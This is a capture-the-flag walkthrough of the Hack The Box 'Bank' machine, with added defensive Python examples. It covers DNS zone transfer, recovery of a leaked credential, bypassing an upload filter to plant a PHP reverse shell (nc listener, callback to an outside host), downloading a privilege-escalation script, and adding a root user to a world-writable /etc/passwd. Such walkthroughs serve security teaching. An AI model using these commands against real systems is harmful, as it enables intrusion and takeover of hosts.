# Enumeration
### NMAP
The nmap scan reveals ports 22, 53 and 80 open, so we can assume there is an SSH service, a DNS server and an HTTP web application. Let's enumerate the DNS and check out the findings in our browser.
```text
Host is up (0.047s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
|_  256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
### [DNS Enumeration](https://medium.com/@klockw3rk/back-to-basics-dns-enumeration-446017957aa3)
```text
# dig axfr @10.10.10.29 bank.htb

; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
; (1 server found)
;; global options: +cmd
bank.htb.      604800 IN SOA   bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.      604800 IN NS    ns.bank.htb.
bank.htb.      604800 IN A     10.10.10.29
ns.bank.htb.   604800 IN A     10.10.10.29
www.bank.htb.  604800 IN CNAME bank.htb.
bank.htb.      604800 IN SOA   bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 47 msec
;; SERVER: 10.10.10.29#53(10.10.10.29)
;; WHEN: Tue May 11 03:28:16 EDT 2021
;; XFR size: 6 records (messages 1, bytes 171)
```
# Web App Enumeration
#### /etc/hosts
Add the IP address and the discovered names to our hosts file in /etc/hosts as:

```text
10.10.10.29 bank.htb chris.bank.htb ns.bank.htb
```
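The zone transfer above hands out every record in the zone, so a defender can use the same output to see exactly what an open AXFR discloses. As an added example (not part of the original write-up), the parser below turns dig's AXFR output into /etc/hosts lines grouped by address; it collects names from A and CNAME records only, because `chris.bank.htb.` in the SOA record is the RNAME mailbox field (chris@bank.htb), not necessarily a host.

```python
from collections import defaultdict

# Constructed sample: the dig axfr answer shown above, embedded so the
# example runs offline.
AXFR_OUTPUT = """\
; <<>> DiG 9.16.11-Debian <<>> axfr @10.10.10.29 bank.htb
;; global options: +cmd
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb. 604800 IN NS ns.bank.htb.
bank.htb. 604800 IN A 10.10.10.29
ns.bank.htb. 604800 IN A 10.10.10.29
www.bank.htb. 604800 IN CNAME bank.htb.
bank.htb. 604800 IN SOA bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; XFR size: 6 records (messages 1, bytes 171)
"""


def parse_axfr(text):
    """Return (owner, type, rdata-fields) for every record line in dig axfr output."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # dig's own comment lines and blank lines
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue  # not a resource record line
        records.append((fields[0].rstrip("."), fields[3], fields[4:]))
    return records


def hosts_entries(records):
    """Map each IPv4 address to the names that resolve to it (A directly, CNAME via its target)."""
    a_records = {name: rdata[0] for name, rtype, rdata in records if rtype == "A"}
    names_by_ip = defaultdict(set)
    for name, ip in a_records.items():
        names_by_ip[ip].add(name)
    for name, rtype, rdata in records:
        if rtype == "CNAME":
            target = rdata[0].rstrip(".")
            if target in a_records:  # only follow CNAMEs that land inside this zone
                names_by_ip[a_records[target]].add(name)
    return {ip: sorted(names) for ip, names in names_by_ip.items()}


def hosts_file_lines(records):
    """One '/etc/hosts' style line per address."""
    return [f"{ip} {' '.join(names)}" for ip, names in hosts_entries(records).items()]
```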
#### chris.bank.htb bank.htb ns.bank.htb
#### Dirbuster
A couple of interesting directories were found for http://bank.htb, including the /balance-transfer/ directory, which is not shown in the screenshot.
The *user* and *ticket* files do not return anything but a footer; /balance-transfer/, on the other hand, is more interesting:
#### /balance-transfer/
/balance-transfer/ is a directory which contains a bunch of encrypted account files. While scrolling through the directory, looking for something out of the ordinary, I found a file that is about 50% smaller than the rest.
When opened, it turns out that encryption failed for this file, so it is stored in plain text:

```text
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: Christos Christopoulos
Email: [email protected]
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
```
# Exploit
I logged in to the recovered account and discovered a Support page which provides file upload functionality, which is a possible attack surface.
## LFI
The file upload has restrictions in place that prevent me from uploading anything other than images. Let's bypass that with Burp Suite.
#### Burp Suite
After configuring our *php-reverse-shell.php* from pentestmonkey, we try to upload it through the file upload form while having *intercept on*. After we capture the POST request, we send it to Repeater in order to probe the restrictions in place. And voila...
## Shell
Open a nc listener that will catch the reverse connection, and fetch the uploaded file.

```text
$ curl "http://bank.htb/uploads/php-reverse-shell.php.jpeg" |php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5492  100  5492    0     0  53843      0 --:--:-- --:--:-- --:--:-- 53843
PHP Notice:  Undefined variable: daemon in Standard input code on line 184
Successfully opened reverse shell to 10.10.14.3:1234
```
***yikes***, I just hacked myself 😄
Anyway... let's try to forget about that and figure out my next move. I read in the source code that the developer added an exception for the ***htb*** extension for debugging purposes and that files with that extension are executed as PHP. So I uploaded the reverse shell with an .htb extension and simply opened it, which returned a shell.
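The weakness here is a server-side upload check that trusts the file name and carries a debugging exception. As an added example (not code from the write-up or from the box), the snippet below contrasts an assumed extension-only check with the `.htb` exception against a hardened check that requires a single allow-listed extension, verifies the image magic bytes and lets the server choose the stored name; the weak-check logic is an assumption about what the application did, not a copy of it.

```python
import os
import secrets

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Leading bytes each allowed image type must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_check(filename):
    """Assumed shape of the original check: only the final extension is inspected,
    and a leftover debugging exception also accepts '.htb' (executed as PHP)."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT or ext == "htb"


def hardened_check(filename, content):
    """Return (accepted, reason). Name, extension and content must all agree."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or not parts[0]:
        # Exactly one extension: rejects 'php-reverse-shell.php.jpeg' outright.
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_EXT:
        # No debugging exceptions: '.htb' and '.php' fail here.
        return False, f"extension {ext!r} not allowed"
    if not content.startswith(MAGIC[ext]):
        # A PHP payload renamed to .png does not start with the PNG signature.
        return False, "content does not match the claimed image type"
    return True, "ok"


def stored_name(ext):
    """Server-chosen random name, so the caller never controls the path on disk."""
    return f"{secrets.token_hex(16)}.{ext}"
```

Pair this with storing uploads outside the document root, or with the web server configured not to execute scripts in the upload directory, so a validation slip cannot turn into code execution.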
```text
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.29] 58982
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
 12:37:52 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$
```
# Privilege Escalation
We are logged in as www-data. In order to figure out our attack surface, I will run a script called unix-privesc-check. In the following lines, I change to the /tmp folder, because it is a writeable directory, and download the script from my local Kali system.
```text
┌──(kali㉿kali)-[~/bank]
└─$ sudo cp /usr/share/unix-privesc-check/unix-privesc-check .

┌──(kali㉿kali)-[~/bank]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.29 - - [11/May/2021 05:40:44] "GET /unix-privesc-check HTTP/1.1" 200 -
10.10.10.29 - - [11/May/2021 05:41:21] "GET /unix-privesc-check HTTP/1.1" 200 -
```

```text
$ cd tmp
$ touch file
$ ls
file
vmware-root
$ wget http://10.10.14.3:8000/unix-privesc-check
--2021-05-11 12:45:15--  http://10.10.14.3:8000/unix-privesc-check
Connecting to 10.10.14.3:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K) [application/octet-stream]
Saving to: 'unix-privesc-check'

     0K .......... .......... .......... .....                100%  654K=0.05s

2021-05-11 12:45:16 (654 KB/s) - 'unix-privesc-check' saved [36801/36801]

$
```
Let's upgrade our session to be more intuitive and responsive.

```text
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bank:/tmp$ export TERM=xterm
export TERM=xterm
www-data@bank:/tmp$ ^Z
zsh: suspended  nc -nlvp 1234

┌──(root💀kali)-[/home/kali/bank]
└─# stty raw -echo;fg                                    148 ⨯ 1 ⚙
[1]  + continued  nc -nlvp 1234
```
Now I have tab-completion and all keys register as normal.
```text
www-data@bank:/tmp$ chmod +x unix-privesc-check
www-data@bank:/tmp$ ./unix-privesc-check standard
...[snip]...
############################################
Checking if anyone except root can change /etc/passwd
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
```
Ok, so we have a writeable /etc/passwd file. Let's add a privileged user and escalate. Firstly, create a password hash:

```text
$ openssl passwd -1 -salt hacker hacker
$1$hacker$TzyKlv0/R/c28R.GAeLw.1
```
Next, add the user as follows:
```text
www-data@bank:/$ nano /etc/passwd
#################################
add the user in the document like so:
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
#################################
www-data@bank:/$ su hacker
Password:
root@bank:/# whoami
root
root@bank:/#
```
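From the defender's side, the two things that made this escalation possible are a world-writable /etc/passwd and an extra UID 0 account that carries its hash in /etc/passwd instead of /etc/shadow. As an added example (not part of the write-up), the checks below flag both conditions; the passwd sample is constructed, with the `hacker` line copied from the output above, and `is_world_writable` takes a plain mode value so it can be unit-tested without touching the real file.

```python
import os
import stat

# Constructed sample passwd content containing the entry added in the write-up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
"""


def suspicious_passwd_entries(text):
    """Return (line_no, user, reason) for entries a monitoring job should raise.

    Flags: any UID 0 account other than root, an empty password field (login
    without a password), and a real hash in the password field (shadowed
    systems keep 'x', '*' or '!' here)."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and user != "root":
            findings.append((line_no, user, "extra UID 0 account"))
        if pw == "":
            findings.append((line_no, user, "empty password field"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((line_no, user, "password hash stored in passwd"))
    return findings


def is_world_writable(mode):
    """True if the 'other' write bit is set, the condition unix-privesc-check warned about."""
    return bool(mode & stat.S_IWOTH)


def check_passwd_file(path="/etc/passwd"):
    """Run both checks against a real file; returns (world_writable, findings)."""
    with open(path, encoding="utf-8") as fh:
        findings = suspicious_passwd_entries(fh.read())
    return is_world_writable(os.stat(path).st_mode), findings
```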